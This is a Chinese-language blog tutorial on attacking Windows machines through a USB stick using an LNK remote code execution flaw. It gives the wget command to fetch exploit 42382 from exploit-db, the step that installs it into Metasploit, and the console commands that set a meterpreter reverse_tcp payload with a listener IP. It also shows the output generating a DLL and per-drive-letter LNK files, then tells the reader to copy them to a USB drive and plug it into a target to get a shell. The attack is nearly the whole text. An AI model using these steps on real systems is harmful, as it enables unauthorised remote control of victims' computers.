目录
通过U盘使用Link漏洞进行攻击
1. 下载漏洞脚本
从 exploit-db 下载 LNK Remote Code Execution Vulnerability 漏洞文件
wget https://www.exploit-db.com/download/42382.rb
2. 安装漏洞脚本
安装漏洞脚本很简单,只需要将下载的ruby漏洞脚本文件放到metasploit指定目录中即可
cp 42382.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
3. 启动监听并生成文件
msf > search 42382
msf exploit(42382) > use exploit/windows/fileformat/42382
msf exploit(42382) > set payload windows/x64/meterpreter/reverse_tcp # 注意目标是x86还是x64的
msf exploit(42382) > set lhost 192.168.1.15
msf exploit(42382) > show targets
msf exploit(42382) > set target 0
msf exploit(42382) > exploit
[*] /root/.msf4/local/lLbLLlpJEWOCVjXn.dll created copy it to the root folder of the target USB drive
[*] /root/.msf4/local/attUBiQoEENCHdXj_D.lnk create, copy to the USB drive if drive letter is D
[*] /root/.msf4/local/TPIhmhvfUkHRaotP_E.lnk create, copy to the USB drive if drive letter is E
[*] /root/.msf4/local/jlhbqmicbvEDUucR_F.lnk create, copy to the USB drive if drive letter is F
[*] /root/.msf4/local/KvvqRTlZixISpRHK_G.lnk create, copy to the USB drive if drive letter is G
[*] /root/.msf4/local/FDiknQGLVXPKFBIC_H.lnk create, copy to the USB drive if drive letter is H
[*] /root/.msf4/local/gHhqXTwmxeDPlpTA_I.lnk create, copy to the USB drive if drive letter is I
[*] /root/.msf4/local/njveXscZFvRwJLFJ_J.lnk create, copy to the USB drive if drive letter is J
[*] /root/.msf4/local/nZxhpuwJHVAIUNXx_K.lnk create, copy to the USB drive if drive letter is K
[*] /root/.msf4/local/QbOVySllSZXOmglY_L.lnk create, copy to the USB drive if drive letter is L
[*] /root/.msf4/local/qQhIaawNDiMbcaqK_M.lnk create, copy to the USB drive if drive letter is M
[*] /root/.msf4/local/fSylFhAGVNNwaYnd_N.lnk create, copy to the USB drive if drive letter is N
[*] /root/.msf4/local/PQyizrKnVNCRQJkd_O.lnk create, copy to the USB drive if drive letter is O
[*] /root/.msf4/local/xfhnyJCEsOdbpnhs_P.lnk create, copy to the USB drive if drive letter is P
[*] /root/.msf4/local/oSYDiEMnouNpHFqE_Q.lnk create, copy to the USB drive if drive letter is Q
[*] /root/.msf4/local/OBlpipdrGcLVdvhd_R.lnk create, copy to the USB drive if drive letter is R
[*] /root/.msf4/local/MFxDTvxGjYarzweM_S.lnk create, copy to the USB drive if drive letter is S
[*] /root/.msf4/local/LwmuNxBWnRfWevDC_T.lnk create, copy to the USB drive if drive letter is T
[*] /root/.msf4/local/wlJlNxRBICJVLnQX_U.lnk create, copy to the USB drive if drive letter is U
[*] /root/.msf4/local/rOHsCIBWNTrXGstq_V.lnk create, copy to the USB drive if drive letter is V
[*] /root/.msf4/local/BKUZRSPKBSukmlpy_W.lnk create, copy to the USB drive if drive letter is W
[*] /root/.msf4/local/hbOvINMLAxHcWavV_X.lnk create, copy to the USB drive if drive letter is X
[*] /root/.msf4/local/FTLzXgWfeTeMuieN_Y.lnk create, copy to the USB drive if drive letter is Y
[*] /root/.msf4/local/JKYOcCLPNuxnHvlh_Z.lnk create, copy to the USB drive if drive letter is Z
执行上述metasploit命令后会在本地启动好监听程序,并在~/.msf4/local中生成多个link文件
4. 制作渗透U盘
在目录 ~/.msf4/local 将生成的所有 Link 文件拷贝到U盘的根路径中
5. 触发漏洞得到Shell
将U盘插入目标windows机器中,打开U盘就会出发远程link漏洞,在Metasploit控制台中得到目标主机的shell
版权所有,本作品采用知识共享署名-非商业性使用 3.0 未本地化版本许可协议进行许可。转载请注明出处:https://www.wangjun.dev//2017/11/u-link-remote-vulnerability/